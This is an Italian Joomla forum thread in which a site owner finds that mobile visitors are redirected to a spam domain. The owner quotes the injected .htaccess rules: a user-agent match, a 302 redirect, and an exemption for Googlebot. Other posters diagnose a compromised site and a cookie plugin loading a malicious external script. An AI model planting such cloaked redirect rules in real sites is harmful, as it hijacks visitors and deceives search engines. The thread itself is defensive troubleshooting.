Joomla.it Forum
Non solo Joomla... => Sicurezza => : blumedia 04 Oct 2017, 10:27:43
-
Buongiorno
ho costruito un sito con un template responsivo di joomla 3.8.0
Il mio problema è che su pc all'indirizzo www.maxilar.it corrisponde il sito costruito, invece su cellulare non si riesce proprio a raggiungere.
Al suo posto appare un sito fantasmatico, seokiRja.com, con un messaggio che specifica che il dominio deve essere verificato ecc...
Secondo voi è un errore del server, un errore sul template (e quindi di chi lo ha costruito, o un virus?
Grazie infinite
B.
-
Come hai ottenuto quel template?
-
Il problema è sul file .htaccess che ha il seguente codice:
RewriteEngine On
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "android|BlackBerry|htc|iPad|iPhone|iPod|kindle|lg|midp|mmp|mobile|mot|nokia|o2|opera mini|J2ME" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pocket|psp|sgh|smartphone|sonyericsson|symbian|treo mini|up.browser|up.link|vodafone|wap" [NC]
RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC]
RewriteRule ^(.*)$ http://seokirja.com [L,R=302]
Se lo tolgo cosa succede?
-
OK. Tolto file e tutto funziona.
-
Mi spiace ma non funziona niente...Il tuo sito è stato hackerato e hai qualche script malevolo da qualche parte.
Ad sempio se navigo sul tuo sito con uno user agent mobile alla pressione del tasto back del browser mi si aprono una miriade di popup.
Leggiti i post in evidenza nella sezione Sicurezza di questo forum e tratta il tuo sito come totalmente compromesso.
-
Sembra lo stesso (il solo?) problema descritto in questo post:
http://forum.joomla.it/index.php/topic,265360.0.html
Anche il tuo sito serve l'estensione dei cookie silktide, come nel post che ho indicato, ancora servito da amazon.
Se guardi il sorgente js puoi capire che succede.
src="https://s3-eu-west-1.amazonaws.com/assets.cookieconsent.silktide.com/current/plugin.min.js"
-
Ti ringrazio infinitamente, ma per me quello che hai detto è quasi arabo.
puoi indicarmi cosa dovrei fare?
Grazie di nuovo
-
Leggiti i post in evidenza nella sezione Sicurezza di questo forum e tratta il tuo sito come totalmente compromesso.
-
Se sei il webmaster è preoccupante :D
Se non sei il webmaster contatta chi ti ha fatto il sito e digli di iniziare a cambiare il componente che gestisce la cookie law.
-
Allora.
Disattivato il componente cookie, che si attiva direttamente dallo stile del template.
Adesso sembra che non ci sia più il problema.
Utilizzerò un altro plugin esterno per i cookie.
Dovrei ugualmente cercare il codice ackerato, ma da dove inizio.
Nella cartella del template, immagino, visto che è da lì che si attiva.
O lascio tutto com'è?
-
Come hai ottenuto quel template?
-
Template gratuito: meet gavern
-
Template gratuito: meet gavern
Visto l'evolversi della situazione penso che questo dettaglio sia tralasciabile
-
Questo problema è comune ai template Gavick che implementano quel componente: sul loro forum c'è qualcuno che si lamenta proprio su questo argomento.
Il malware risiede sul server amazon, sul tuo server non c'è lo script, nel modulo dei cookie c'è solamente la stringa che richiama il file esterno su amazon.
PS: questo però mi sa che non è l'unico problema, non ha a che vedere con la modifica all'htaccess che hai scoperto.
Quindi vale ciò che è stato scritto in precedenza, considera il sito come totalmente compromesso.